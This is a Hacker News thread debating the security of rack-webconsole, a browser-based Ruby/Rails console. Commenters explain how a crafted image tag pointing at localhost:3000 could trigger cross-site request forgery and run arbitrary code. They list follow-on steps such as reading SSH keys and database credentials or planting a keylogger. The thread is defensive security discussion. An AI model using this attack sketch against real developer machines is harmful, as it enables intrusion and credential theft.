Hacker News new | comments | show | ask | jobs | submit login
Rack-webconsole: a Ruby/Rails console inside your browser (codegram.com)
104 points by rohitarondekar 2372 days ago | hide | past | web | favorite | 55 comments



On the CSRF concern, which is totally valid, I've pushed a patch. From version 0.0.5 it uses a token to prevent this kind of attacks.

https://github.com/codegram/rack-webconsole/commit/d5060d0e8...


This is a very bad idea.


As patio11 already noted, this is a bad idea. Further more, I don't see what it solves? Can't you just ssh into the box, and have that window open? Isn't this a window manager problem rather than a "rake/infrastructure" problem?


It is meant for development environments only. Nobody would risk putting a Ruby console in production :)

In fact, when using it with Rails, it is loaded only in development environment. With other frameworks you should take care of what middlewares you use in which environment.


I would think long and hard about whether giving code execution privileges on your local machine to anyone who can convince you to click on a link is a good idea. Actually, this should not be either long or hard.

Edit to add: You don't even need to click on the link, you just need to view an image whose src I can manipulate. Ugh. Seriously: do not install on any environment anywhere.


Can you expand on this? What's the risk? What's the attack vector?


Cross-site request forgery.

I should add though that even if this thing gets an XSRF token and it's secure, you might as well take the passwords off your SSH keys if you're running this, because you're coughing up an unprotected remote shell to anyone who can talk to a dev server once you turn this on.


I think he's saying that someone can make you open a web page that includes an image with the proper src attribute and bang, your Rails site is broken.


More likely, your whole data center.


Hyperbolic.


I know you've been a dev/ops guy for 20 years and I respect the fact that your development machines are sealed in vaults, but I've gotten to assess more than half of the top 10 biggest Rails apps in the world over the past couple of years and trust me, you're just wrong about this. Development machines are within reach of developer browsers. Database machines are within reach of development machines.


You've probably figured this out by now, but I'm pretty sure you're missing the point. From your other comments in this thread you appear to think that the machine needs to be internet-accessible. Have a public IP. Open Firewall. All that.

The reason this is so dangerous is that it needs none of that. All it needs is for your development machine to have access to the internet.

I open up a project, enable this, and run rackup locally.

I then view your Twitter stream, where you've embedded a crafted link behind a URL shortener.

Because that link is executed by me, you've now remotely executed code on my machine. Assuming I'm anything like most Rails shops you can probably get to a number of other machines through my machine.


> What's the attack vector?

CSRF.


You're right, that's a risk. I've opened an issue to implement a simple pseudorandom token to protect AJAX requests. What do you think? https://github.com/codegram/rack-webconsole/issues/4


I think you can achieve the same thing using shellinabox. Take a look at http://blog.servermonitoringhq.com/posts/the_ultimate_web_ba...


Right! A dev server is for dev, even to show off the app to your friends you've got to remove this console. So IMHO, you don't have to worry about security if it's your tiny dev machine that runs on your desk, unless you are paranoid about securing your iron cage.

If anyone has used the Seaside framework, can you throw some light on how this compares to the in-page editing that Seaside provides (as per what I've heard).


A dev server is for dev, even to show off the app to your friends you've got to remove this console. So IMHO, you don't have to worry about security if it's your tiny dev machine that runs on your desk

One of your friends is named Firefox, and he does not take orders from you, he takes orders from me.


So people now downvote if they don't agree with you? sw33t. I would love to know a reason.


Patrick, I love everything you post, normally. In this case, you've misunderstood. This is a development and test tool. If someone puts this into the production environment, he deserves what he gets. For development, this is invaluable and awesome.


Sabat, would you do the following for me?

Turn on Rails.

Open Firefox, type http://localhost:3000/a-malicious-string into the top bar. Hit enter.

Observe how that gets you a malicious string to your web server. This particular string will 404. I can construct much more interesting strings.

Now, notice that step where I told you a URL to type in? Pretend that, instead, I had control over some element of a webpage you were looking at. Any element would do. Say, you come to a blog where I control an image embed for my avatar, and I embed <img src="http://localhost:3000/a-malicious-string />. Firefox is going to make the HTTP request I desire without you having to do anything suspicious and without me having to ever talk to localhost:3000 directly.

After I have a malicious string in your web server, this application lets me execute arbitrary code as your web server. Things get very, very interesting then, in the "may you live in interesting times" sense of interesting. For example, one interesting thing I could do is read your SSH private key, which you use to connect from development to staging or production. Another thing I could do is read your database credentials from database.yml, and maybe even just open up extra ActiveRecord connections directly to those databases and start executing arbitrary SQL. Still another thing I could do is install a keylogger or rootkit on your local machine and wait to get whatever credential I need to totally compromise your company. There are many, many options.

Do not install this anywhere.


Hmm. What would you say about the Werkzeug debugger? It's been around a while but also allows in-browser console debugging.

http://werkzeug.pocoo.org/docs/debug/


I'd be interested in this as well (as someone preparing to start a flask project)...


Ah Flask is pretty incredible. You could probably learn it and build a functional MVP by the time we get a decent answer. (And no, I'm not hinting that it'll take a long time for him to answer :)

You can turn off the console debugger though if it's making you uneasy by doing this:

    app.run('localhost', debug=True, use_evalex=False)
You'll still get the nice stack trace and code context, but without the ability to run arbitrary code.


Help me understand this. In your example, how would this malicious string be any more worrisome with the console installed than without it? I realize you could trigger the console to be displayed by crafting a URL, but it would be displayed in my browser (and thus, localhost) as the consumer of your URL, correct? It'd be one thing if this gem caused any arbitrary query string to be executed as ruby code, but I don't believe it does. So help me understand the way you could exploit this?

I'm not doubting you...I'd simply like to understand. Thanks.


It'd be one thing if this gem caused any arbitrary query string to be executed as ruby code

That's pretty much the exact designed intent of the software. Read the Repl code, specifically, Repl#call at line 59 or so.

https://github.com/codegram/rack-webconsole/blob/master/lib/...

You'll note the code has recently been enhanced with check_legitimate, which was designed to patch the issue I raised on this thread (and via email). I am going to very carefully avoid commenting about whether check_legitimate actually works as designed. My main worry is that pronouncing it done well would make me professionally responsible when it gets cracked, and committing to endless rounds of "Actually, that won't really work" throws good hours after bad in pursuit of securing a bad idea which is architecturally insecurable.

Do not allow your web application to execute arbitrary code. It will not end well.


Isn't this in the same vein as Ajaxterm/Anyterm? I suppose most uses of those (e.g. Slicehost/Linode) are behind SSL.


What difference are you supposing that would make?


I have preconceived ideas but I am not a security specialist by profession and hence the question. Perhaps you can explain instead of a downvote?


Since the request is coming from an authorized user, then SSL won't matter any which way. The action the attacker is causing the user to take would be legitimate except the user doesn't actually want to do it. Check out CSRF.


Thanks Mentat. Yup, I understand CSRF and current methods such as tokenization, double submit cookies, etc. I was trying to get an explanation from tptacek or patio11 about their statements about unprotected shells and arbitrary code.

The most voted comment is from patio11 about it being a very bad idea. A lot of discussion and hand-waving happened before finally CRSF was even mentioned. Once the author implemented a CSRF fix, the conversation seemed to quiet down. So is this kind of web-based access on the road to being safe and usable now? Many popular VPS hosts offer out-of-band access through web-based consoles such as Anyterm and Ajaxterm. Are those acceptable simply because they've taken care of the CSRF, XSS common issues? They allow arbitrary code on the remote boxes so how are they different from a security concern? I have no idea so I just threw out SSL even though it probably makes no bit of difference. I simply don't have the background or experience to know. Is it time to be concerned about how proficient the hosts are in securing their hypervisors and bridged networking for guests? If they do pose a concern, then why is there not more brouhaha about it to get some attention on the matter? Linode and Slicehost have a lot of customers...

To just say it is a bad idea and move on and not mention other implementations seems to leave a bad taste. Someone also asked about Werkzeug(of the Python demesne) as well...


The idea is that any sort of web console (that can be attacked with CSRF) is a really bad idea as it likely results in a complete compromise. Most web developers are not at all good at web security (case in point being this release with easy CSRF vulnerabilities). The likelihood that the same or similar mistakes will be introduced again later is high. The conservative approach is that, because the consequences of a failure are really bad, and because the level of convenience beyond an ssh shell is marginal, therefore you should never use web consoles. I guess if you were an expert at web security you could analyze a particular web console and say "yeah, it looks ok to me and I'm willing to take the risk." I think Patrick is saying that he doesn't see that being a worthwhile tradeoff for himself (as an expert) and therefore it seems particularly unwise for non-experts to be doing it.

There is some buzz about doing cloud to cloud attacks but I haven't heard anything that's been realized yet. I have also heard that there are issues with data staying resident on local disks on EC2 after machine termination, but I don't know if that's the case.


I insist, this is fixed in version v0.0.5, thanks to your very warning.


He understands that. Like me (we've trained him well!), he does not have particularly great faith in the insulating powers of the words "development environment".

At a minimum, after running this you are one Twitter shortened link away from losing your development machine. The link will probably show you a cute cat picture just like any other one. You'll only find out you lost the machine later.

At worst, you're one of the 80% of companies that keeps development machines in your data center protected by a firewall/VPN. Now you're a cute cat picture away from attackers with direct TCP access to your database servers. Wee!


I've read through the rest of this thread, and I'm still not understanding the big deal about this tool.

If the entire dev environment is my macbook, and the app is localhost:3000, and the line to enable this thing exists only in the development environment initializer, and I leave it commented out all the time except for those rare cases where I want to inspect session variables and controller state or some other thing that can't really be done in irb, then what's the risk?

At least, that's how I would use it...

EDIT: Nevermind, patio11 explained it much better in his response above. I still think this could be a useful tool with CSRF protection.


There used to be web-based Rails debuggers, didn't there? I haven't used any kind of Ruby debugger since 2007. I just keep an SSH screen with "bundle exec rails console" running. I'm of the impression that this is what most people do.

So what's the win here?

Even with CSRF protection, you still have to worry about who can talk to port 3000 on your machine. There's a "rails server" running on my Macbook pretty much every day. I bought a whole separate Macbook because I was worried about the attack surface that Rails runs with by default. Adding a remote shell to the mix doesn't seem like a win.


> There used to be web-based Rails debuggers, didn't there?

I'm not sure.. This is the first one that I've ever heard of. Well, remote debugging has been around for years for plenty of platforms, and this is the first remote debugging tool for Ruby that I have seen, and embedding it into Rack is kind of cool and useful. And sure, probably not very secure in version 0.0.5.

That doesn't mean "All remote debugging is bad and insecure, and you're stupid for even considering this," which sadly is the tone that people are taking. I can think of several ways that this thing could be made more secure. The gem initializer could take a private key, and the backtick command could prompt you to enter the public key, rather than just dropping you right into a console and executing your arbitrary code.

> So what's the win here?

Yes, normally I would just ssh to the remote machine and and "bundle exec rails console" too. OR far more likely, there is no remote machine, I just open another terminal window and keep a console running. (sorry I said "irb", though I meant "rails console" -- In my mind they are basically the same thing).

The win (at least, to me) is that I can inspect parts of the rails stack that change as the user (me) is interacting with the app, such as request details, session contents, controller variables.

>I just keep an SSH screen with "bundle exec rails console" running. I'm of the impression that this is what most people do.

>I bought a whole separate Macbook because I was worried about the attack surface that Rails runs with by default.

This seems a bit incongruous, don't you think? I'm not trying to pick a fight, but I read stuff like this and I just feel sad...


after running this you are one Twitter shortened link away from losing your development machine

Who runs an internet-accessible development machine? Maybe I give the rest of the dev world too much credit.

you're one of the 80% of companies that keeps development machines in your data center protected by a firewall/VPN

I've been in Dev/Ops for about 20 years, and been working the internet since the web took off in '94. I have never, ever heard of such a thing, and would freak out if I did. 80% of companies? Maybe you've got stats to back this up, and my experience is merely anecdotal -- but I've never heard of a single instance of something so obviously stupid. SQL injection vulnerability, sure. XSRF, XSS vulnerability, sure. Running a database server on the same host as your app server, with the webserver running as the DBA user? Sure, it happens.

Certainly someone is bound to misuse this gem as well. But that doesn't mean it's "a very bad idea". It's a very good idea. It's just that it takes knowledge and experience to run a web site, and some people have to find out the hard way.


Everybody runs development machines that can (a) be spoken to by machines with human-driven browsers and (b) can speak to other machines.

You're a dev/ops guy, I'm an appsec security assessor. I think we just look for different things. Trust me, this isn't just common it's standard practice.

It's a clever bad idea. Minimal payoff. Maximum risk.

Incidentally: I'm not sure I'm in love with this "everyone has to find out the hard way" notion. No, they don't. We can just tell them: DON'T RUN STUFF LIKE THIS, IT WILL HURT YOU. You have 20+ years of experience. Most people on HN do not; they see this, think "ooo, shiny", and install it. As a practitioner yourself, you have a responsibility --- in fact, if you're keeping that CISSP cert current, an obligation --- to step in and help that not happen.

By the way: hey, you asked.


Who runs an internet-accessible development machine? Maybe I give the rest of the dev world too much credit.

I apologize for not having an underground cold war bunker with which to develop my software on. Until i get one, I'll stick with my one and only machine (which, as you can tell, has internet access) for doing development.

EDIT: And because of it, i'd never put this code on a machine i run.


Most professional shops do indeed have dev machines. They live at Rackspace alongside the prod servers. They are protected from the Internet by firewall rules; you need a VPN connection to access them. Unfortunately, everyone who writes code has that VPN connection accessible at all times, because that's their job, and so rack-webconsole puts them a cute cat picture away from giving an anonymous Twitter user access to their data center.


It doesn't need to be internet enabled, that's the point. As long as I can guess the URL you are using for your development machine and have you click on a link on your laptop one can make this work (in the bad sense of the word).


Who runs an internet-accessible development machine? Maybe I give the rest of the dev world too much credit.

I am reminded of Sony's plain text captcha. There are stupid people out there.


You're a dev/ops guy, I'm an appsec security assessor. I think we just look for different things. Trust me, this isn't just common it's standard practice.

Actually I'm a CISSP and was CISO for a major financial web site for >5 years. I look at things the way you do, trust me.

It's just that I try to temper my security reflexes. Just because something might be potentially dangerous doesn't means it's automatically a bad idea.

Everybody runs development machines that can (a) be spoken to by machines with human-driven browsers and (b) can speak to other machines.

Indeed we do. And if you can't trust that environment to be private and secure, then you've got bigger problems than a web console. I wouldn't stop at shutting down SSH; I'd disconnect entirely. Hell, I'd quit.

If your dev environment is exposed to people who are malicious, you're screwed. Web console is not going to hurt you, because it's too late -- you've already been hacked.


I think you're missing the part about how your dev machine doesn't have to be exposed to malicious people here.

My condolences on having to get the CISSP. ;)


I think you're contemplating the attack vectors from the wrong direction. We're not necessarily talking machines with open ports on internet facing IP addresses. Think about it from the other direction.

The root of the problem lies at the feet of a few factors:

A) HTTP is a relatively "trusted" protocol, which means you should be very, very careful about running local services over HTTP (on any port) that can do bad thingsā„¢ to your computer.

B) http://localhost:3000/ isn't difficult to guess. If you know someone is a Rails developer, there is a good chance that embedding requests to that URL will hit a Rails dev environment at some point, and that's where this thing is going to end up running.

C) Eval, in general, is just about the right length of rope to hang yourself with. Use sparingly and with great respect for its ability to completely hose you. Passing anything sent as HTTP params to eval is just asking for it.

Knowing the above, consider an example like Patrick (patio11) outlines above.

Let's say this takes off and people start using it. This means that some percentage of Rails devs have this running. To attack their machines, I need only to trick their machine in to making a request to 'http://localhost:3000/malicious-string-here.

How might I accomplish that? I like Patrick's suggestion of an img tag src attribute. There are plenty of forums that treat img tags as safe, or provide some means of embedding images with arbitrary src attributes.

So let's say I head over to railsnewbforum.com and embed the malicious image in my sig. Then I start happily posting useful information in every thread on the board. Assuming this webconsole takes off, how long until a vulnerable dev hits a page with my malicious signature code and gets pwnd?

Can this be made safe? Probably to some degree, but then it would involve many of the security measures involved with using the Rails console over an ssh session or something similar.

IMO, it's not worth the risk.


Nice way to introduce Rack. Much better than the usual hello world.

I wouldn't use it for obvious reasons, but I like the demo.


Cool! Firebug for the frontend, rack-webconsole for the backend.


Reading the headline, I was hoping this was a ruby-debug console in the localhost browser for the current request. Perhaps that can be shoehorned into rack-webconsole?


You'd probably be interested in https://github.com/ryanb/enlighten


I think this is a pretty cool tool, for both development/staging and also for production in a very restricted way. Every site has some kind of admin panel. I see this like a phpMyAdmin on asteroids for rack apps.

Definitely interesting.


I see this like a phpMyAdmin on asteroids for rack apps.

Dear christ, please do not ever put this near production.


phpMyAdmin on asteroids sounds about right. http://en.wikipedia.org/wiki/Cretaceous%E2%80%93Tertiary_ext...


Except for extreme circumstances (emergency debugging) I wouldn't let this thing near production. For development, it's super-handy, though.


It's sweet to see internet browsers opening up for development within themselves. We can surely do this securely with some amount of effort. I'd love to see a world without the need for Eclipse / Aptana.


This seems like a boon for anyone trying to develop and debug issues on Heroku




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact

Search: